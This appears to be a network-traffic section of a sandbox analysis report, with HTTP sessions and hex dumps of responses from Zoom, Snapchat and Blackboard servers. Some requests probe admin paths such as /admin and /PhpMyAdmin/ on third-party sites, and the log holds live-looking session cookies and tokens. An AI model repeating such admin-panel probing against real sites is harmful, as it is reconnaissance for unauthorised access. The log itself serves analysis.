                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC627INData Raw: 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 5f 7a 6d 5f 76 69 73 69 74 6f 72 5f 67 75 69 64 3d 36 38 39 30 32 38 37 37 64 37 37 38 34 32 64 33 39 65 38 31 36 37 37 65 34 30 38 66 39 64 38 63 3b 20 4d 61 78 2d 41 67 65 3d 33 31 35 33 36 30 30 30 3b 20 45 78 70 69 72 65 73 3d 54 75 65 2c 20 30 34 20 46 65 62 20 32 30 32 35 20 31 31 3a 31 36 3a 31 32 20 47 4d 54 3b 20 44 6f 6d 61 69 6e 3d 7a 6f 6f 6d 2e 75 73 3b 20 50 61 74 68 3d 2f 3b 20 53 65 63 75 72 65 0d 0a 78 2d 7a 6d 2d 7a 6f 6e 65 69 64 3a 20 56 41 32 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 61 6e 67 75 61 67 65 3a 20 65 6e 2d 55 53 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: set-cookie: _zm_visitor_guid=68902877d77842d39e81677e408f9d8c; Max-Age=31536000; Expires=Tue, 04 Feb 2025 11:16:12 GMT; Domain=zoom.us; Path=/; Securex-zm-zoneid: VA2content-language: en-USCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"h
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1369INData Raw: 36 64 31 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3a 66 62 3d 22 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 20 7a 6f 6f 6d 76 69 64 65 6f 63 61 6c 6c 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 2f 7a 6f 6f 6d 76 69 64 65 6f 63 61 6c 6c 23 22 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 5a 6f 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 6d1d<!doctype html><html xmlns:fb="http://ogp.me/ns/fb#" lang="en-US"><head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# zoomvideocall: http://ogp.me/ns/fb/zoomvideocall#"><title>Page Not Found - Zoom</title><meta http-equiv="X-UA-Compati
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1369INData Raw: 2c 20 76 69 64 65 6f 20 63 6f 6e 66 65 72 65 6e 63 65 2c 20 6f 6e 6c 69 6e 65 20 6d 65 65 74 69 6e 67 73 2c 20 77 65 62 20 6d 65 65 74 69 6e 67 2c 20 76 69 64 65 6f 20 6d 65 65 74 69 6e 67 2c 20 63 6c 6f 75 64 20 6d 65 65 74 69 6e 67 2c 20 63 6c 6f 75 64 20 76 69 64 65 6f 2c 20 67 72 6f 75 70 20 76 69 64 65 6f 20 63 61 6c 6c 2c 20 67 72 6f 75 70 20 76 69 64 65 6f 20 63 68 61 74 2c 20 73 63 72 65 65 6e 20 73 68 61 72 65 2c 20 61 70 70 6c 69 63 61 74 69 6f 6e 20 73 68 61 72 65 2c 20 6d 6f 62 69 6c 69 74 79 2c 20 6d 6f 62 69 6c 65 20 63 6f 6c 6c 61 62 6f 72 61 74 69 6f 6e 2c 20 64 65 73 6b 74 6f 70 20 73 68 61 72 65 2c 20 76 69 64 65 6f 20 63 6f 6c 6c 61 62 6f 72 61 74 69 6f 6e 2c 20 67 72 6f 75 70 20 6d 65 73 73 61 67 69 6e 67 22 20 2f 3e 0a 3c 6d 65 74 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: , video conference, online meetings, web meeting, video meeting, cloud meeting, cloud video, group video call, group video chat, screen share, application share, mobility, mobile collaboration, desktop share, video collaboration, group messaging" /><meta
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1369INData Raw: 74 69 6f 6e 20 75 73 65 64 20 61 72 6f 75 6e 64 20 74 68 65 20 77 6f 72 6c 64 20 69 6e 20 62 6f 61 72 64 2c 20 63 6f 6e 66 65 72 65 6e 63 65 2c 20 68 75 64 64 6c 65 2c 20 61 6e 64 20 74 72 61 69 6e 69 6e 67 20 72 6f 6f 6d 73 2c 20 61 73 20 77 65 6c 6c 20 61 73 20 65 78 65 63 75 74 69 76 65 20 6f 66 66 69 63 65 73 20 61 6e 64 20 63 6c 61 73 73 72 6f 6f 6d 73 2e 20 46 6f 75 6e 64 65 64 20 69 6e 20 32 30 31 31 2c 20 5a 6f 6f 6d 20 68 65 6c 70 73 20 62 75 73 69 6e 65 73 73 65 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 20 62 72 69 6e 67 20 74 68 65 69 72 20 74 65 61 6d 73 20 74 6f 67 65 74 68 65 72 20 69 6e 20 61 20 66 72 69 63 74 69 6f 6e 6c 65 73 73 20 65 6e 76 69 72 6f 6e 6d 65 6e 74 20 74 6f 20 67 65 74 20 6d 6f 72 65 20 64 6f 6e 65 2e 20 5a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: tion used around the world in board, conference, huddle, and training rooms, as well as executive offices and classrooms. Founded in 2011, Zoom helps businesses and organizations bring their teams together in a frictionless environment to get more done. Z
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1369INData Raw: 73 74 5f 63 6f 6f 6b 69 65 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 20 63 6c 61 73 73 3d 22 6f 70 74 61 6e 6f 6e 2d 63 61 74 65 67 6f 72 79 2d 43 30 30 30 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 71 78 57 44 37 57 35 6a 54 6f 4b 47 54 76 4a 65 31 51 39 71 32 77 22 3e 0a 77 69 6e 64 6f 77 2e 7a 6d 47 6c 6f 62 61 6c 4d 72 6b 74 49 64 20 3d 20 22 36 38 39 30 32 38 37 37 64 37 37 38 34 32 64 33 39 65 38 31 36 37 37 65 34 30 38 66 39 64 38 63 22 20 7c 7c 20 6e 75 6c 6c 3b 0a 77 69 6e 64 6f 77 2e 7a 6d 47 6c 6f 62 61 6c 4d 72 6b 74 4b 65 79 20 3d 20 22 22 20 7c 7c 20 6e 75 6c 6c 3b 0a 77 69 6e 64 6f 77 5b 27 6f 70 74 69 6d 69 7a 65 6c 79 27 5d 20 3d 20 77 69 6e 64 6f 77 5b 27 6f 70
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: st_cookie.min.js" type="text/plain" class="optanon-category-C0004"></script><script nonce="qxWD7W5jToKGTvJe1Q9q2w">window.zmGlobalMrktId = "68902877d77842d39e81677e408f9d8c" || null;window.zmGlobalMrktKey = "" || null;window['optimizely'] = window['op
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1369INData Raw: 69 63 6f 6e 2d 65 72 72 6f 72 20 7b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 37 70 78 3b 0a 63 6f 6c 6f 72 3a 20 23 45 38 31 37 33 44 3b 0a 7d 0a 2e 65 78 70 69 72 65 64 2d 63 63 2d 62 61 6e 6e 65 72 20 2e 7a 6d 2d 69 63 6f 6e 2d 63 6c 6f 73 65 20 7b 0a 63 6f 6c 6f 72 3a 20 23 31 33 31 36 31 39 3b 0a 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 71 78 57 44 37 57 35 6a 54 6f 4b 47 54 76 4a 65 31 51 39 71 32 77 22 20 73 72 63 3d 22 2f 63 73 72 66 5f 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 71 78 57 44 37 57 35 6a 54 6f 4b 47 54 76 4a 65 31 51 39 71 32 77 22 3e 0a 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: icon-error {font-size: 17px;color: #E8173D;}.expired-cc-banner .zm-icon-close {color: #131619;cursor: pointer;}</style><script nonce="qxWD7W5jToKGTvJe1Q9q2w" src="/csrf_js"></script><script nonce="qxWD7W5jToKGTvJe1Q9q2w">window.dataLayer = wind
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1369INData Raw: 72 65 66 27 29 3b 0a 69 66 28 63 6f 6f 6b 69 65 50 72 65 66 44 4f 4d 29 20 7b 0a 63 6f 6f 6b 69 65 50 72 65 66 44 4f 4d 2e 74 65 78 74 20 3d 20 24 2e 69 31 38 6e 2e 67 65 74 28 22 6d 61 72 6b 65 74 69 6e 67 2e 70 72 69 76 61 63 79 2e 6f 6e 65 74 72 75 73 74 2e 63 6f 6f 6b 69 65 5f 70 72 65 66 22 29 3b 0a 7d 0a 76 61 72 20 6f 6e 65 54 72 75 73 74 43 6f 6e 73 65 6e 74 49 64 20 3d 20 4f 6e 65 54 72 75 73 74 2e 67 65 74 44 61 74 61 53 75 62 6a 65 63 74 49 64 28 29 3b 0a 76 61 72 20 61 63 74 69 76 65 47 72 6f 75 70 73 20 3d 20 28 4f 6e 65 74 72 75 73 74 41 63 74 69 76 65 47 72 6f 75 70 73 20 7c 7c 20 27 27 29 2e 73 70 6c 69 74 28 27 2c 27 29 3b 0a 61 63 74 69 76 65 47 72 6f 75 70 73 20 3d 20 61 63 74 69 76 65 47 72 6f 75 70 73 2e 66 69 6c 74 65 72 28 66 75 6e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ref');if(cookiePrefDOM) {cookiePrefDOM.text = $.i18n.get("marketing.privacy.onetrust.cookie_pref");}var oneTrustConsentId = OneTrust.getDataSubjectId();var activeGroups = (OnetrustActiveGroups || '').split(',');activeGroups = activeGroups.filter(fun
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1369INData Raw: 6f 72 64 65 72 2d 6c 65 66 74 3a 20 31 70 78 20 73 6f 6c 69 64 3b 0a 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 30 70 78 3b 0a 7d 0a 23 6f 74 2d 64 6f 2d 6e 6f 74 2d 73 65 6c 6c 20 7b 0a 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 34 32 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 23 6f 74 2d 64 6f 2d 6e 6f 74 2d 73 65 6c 6c 3a 3a 62 65 66 6f 72 65 20 7b 0a 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0a 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 6c 65 66 74 3a 20 36 70 78 3b 0a 74 6f 70 3a 20 35 30 25 3b 0a 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 2d 35 30 25 29 3b 0a 77 69 64 74 68 3a 20 33 30 70 78 3b 0a 68 65 69 67 68 74 3a 20 31 35 70 78 3b 0a 62 61 63 6b
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: order-left: 1px solid;margin-left: 10px;}#ot-do-not-sell {position: relative;padding-left: 42px !important;}#ot-do-not-sell::before {content: "";position: absolute;left: 6px;top: 50%;transform: translateY(-50%);width: 30px;height: 15px;back
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1369INData Raw: 74 72 6f 6c 73 3d 22 73 65 61 72 63 68 42 6f 78 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 42 75 74 74 6f 6e 49 63 6f 6e 22 3e 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 66 6f 63 75 73 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 65 6e 61 62 6c 65 2d 62 61 63 6b 67 72 6f 75 6e 64 3d 22 6e 65 77 20 30 20 30 20 32 30 20 32 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 30 20 32 30 22 20 72 6f 6c 65 3d 22 69 6d 67 22 3e 0a 3c 67 20 66 69 6c 6c 3d 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 3e 0a 3c 70 61 74 68 20 64 3d 22 6d 38 2e 33 36 38 20 31 36 2e 37 33 36 63 2d 34 2e 36 31 34 20 30 2d 38 2e 33 36 38 2d 33 2e 37 35 34
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: trols="searchBox" tabindex="0"><span class="searchButtonIcon"><svg xmlns="http://www.w3.org/2000/svg" focusable="false" enable-background="new 0 0 20 20" viewBox="0 0 20 20" role="img"><g fill="currentColor"><path d="m8.368 16.736c-4.614 0-8.368-3.754


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                211192.168.2.66537634.149.46.130443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC176OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.snapchat.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC5706INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                set-cookie: sc-wcid=7fd9eb6d-6623-499c-b4bd-3c72bad8503b; Path=/; Domain=.snapchat.com; Expires=Tue, 06-Feb-2024 11:16:12 GMT; Max-Age=86400; Secure
                                                                                                                                                                                                                                                                                                                                                                expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubdomains
                                                                                                                                                                                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: allow-from https://iframe.arkoselabs.com
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;
                                                                                                                                                                                                                                                                                                                                                                x-content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;
                                                                                                                                                                                                                                                                                                                                                                x-cloud-trace-context: dd18e57cdfec9e77822963d37165491f
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                server: API Gateway
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 664
                                                                                                                                                                                                                                                                                                                                                                via: 1.1 google, 1.1 google
                                                                                                                                                                                                                                                                                                                                                                alt-svc: clear
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC664INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 69 74 75 6e 65 73 2d 61 70 70 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 2d 69 64 3d 34 34 37 31 38 38 33 37 30 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 26 62
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en"><head><meta charset="utf-8"><meta name="referrer" content="origin"><meta name="apple-itunes-app" content="app-id=447188370"><title>404 &b


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                212192.168.2.66542044.195.133.145443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC334OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucv.blackboard.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74472C5F492A4B3BEA18CC7421A779A020EA298EECDFAB0EDA1FF6AD3E90D0B14C56C348EF11DCF1C015A556B18100061CD
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1165INHTTP/1.1 200
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ucv.blackboard.com
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Content-Language: es-ES
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Expires: Sun, 05 Feb 2023 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Thu, 05 Feb 2004 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                P3P: CP="CAO PSA OUR"
                                                                                                                                                                                                                                                                                                                                                                Pragma: private
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: JSESSIONID=0DC6C8E114AB6AC5B1622F32932865EE; Path=/; Secure
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: BbRouter=expires:1707142572,id:70BDD3982D15BD39D9F429E61AB6F0E7,signature:bb545f6432edb4c6c395d991d45125b57b93f044e3dbb5fa79bbf62b9605e5cf,site:6c65ed46-3830-485d-a4b2-aea1e7764ad4,v:2,xsrf:33fe813f-9782-4f57-ab1f-270109e68435; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                X-Blackboard-appserver: ip-10-146-210-170.ec2.internal
                                                                                                                                                                                                                                                                                                                                                                X-Blackboard-product: Blackboard Learn &#8482; 3900.84.0-rel.31+aedff82
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1
                                                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: Close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC15216INData Raw: 33 62 36 38 0d 0a 3c 21 2d 2d 20 54 68 69 73 20 6c 6f 67 69 6e 2e 6a 73 70 20 66 69 6c 65 20 69 73 20 74 61 67 67 65 64 20 77 69 74 68 20 63 6f 6d 6d 65 6e 74 73 20 69 64 65 6e 74 69 66 79 69 6e 67 20 73 65 63 74 69 6f 6e 73 20 66 6f 72 20 65 61 73 79 20 65 64 69 74 69 6e 67 20 2d 2d 3e 0a 0a 3c 21 2d 2d 20 54 68 69 73 20 73 65 63 74 69 6f 6e 20 62 65 6c 6f 77 20 63 61 6c 6c 73 20 76 61 72 69 6f 75 73 20 73 65 72 76 6c 65 74 73 20 66 72 6f 6d 20 74 68 65 20 4c 65 61 72 6e 20 65 6e 76 69 72 6f 6e 6d 65 6e 74 20 20 61 6e 64 20 6f 74 68 65 72 20 74 68 69 6e 67 73 20 79 6f 75 20 64 6f 6e 27 74 20 77 61 6e 74 20 74 6f 20 74 6f 75 63 68 2e 20 44 6f 20 6e 6f 74 20 64 65 6c 65 74 65 20 61 6e 79 74 68 69 6e 67 20 69 6e 20 74 68 69 73 20 73 65 63 74 69 6f 6e 20 2d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 3b68... This login.jsp file is tagged with comments identifying sections for easy editing -->... This section below calls various servlets from the Learn environment and other things you don't want to touch. Do not delete anything in this section -
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC16384INData Raw: 37 66 66 30 0d 0a 2e 5f 41 2e 4d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 2c 46 45 54 43 48 3a 69 2e 5f 41 2e 66 65 74 63 68 7d 29 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 29 7b 6c 65 74 20 72 3d 61 28 29 3b 72 2e 69 6e 69 74 69 61 6c 69 7a 65 64 41 67 65 6e 74 73 3f 3f 3d 7b 7d 2c 74 2e 69 6e 69 74 69 61 6c 69 7a 65 64 41 74 3d 7b 6d 73 3a 28 30 2c 6e 2e 7a 29 28 29 2c 64 61 74 65 3a 6e 65 77 20 44 61 74 65 7d 2c 72 2e 69 6e 69 74 69 61 6c 69 7a 65 64 41 67 65 6e 74 73 5b 65 5d 3d 74 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 6c 65 74 20 74 3d 61 28 29 3b 72 65 74 75 72 6e 20 74 2e 69 6e 69 74 69 61 6c 69 7a 65 64 41 67 65 6e 74 73 3f 2e 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 64 28 65 2c 74 29 7b 61 28 29 5b 65 5d 3d 74 7d 66 75 6e 63 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7ff0._A.MutationObserver,FETCH:i._A.fetch}),e}function c(e,t){let r=a();r.initializedAgents??={},t.initializedAt={ms:(0,n.z)(),date:new Date},r.initializedAgents[e]=t}function u(e){let t=a();return t.initializedAgents?.[e]}function d(e,t){a()[e]=t}funct
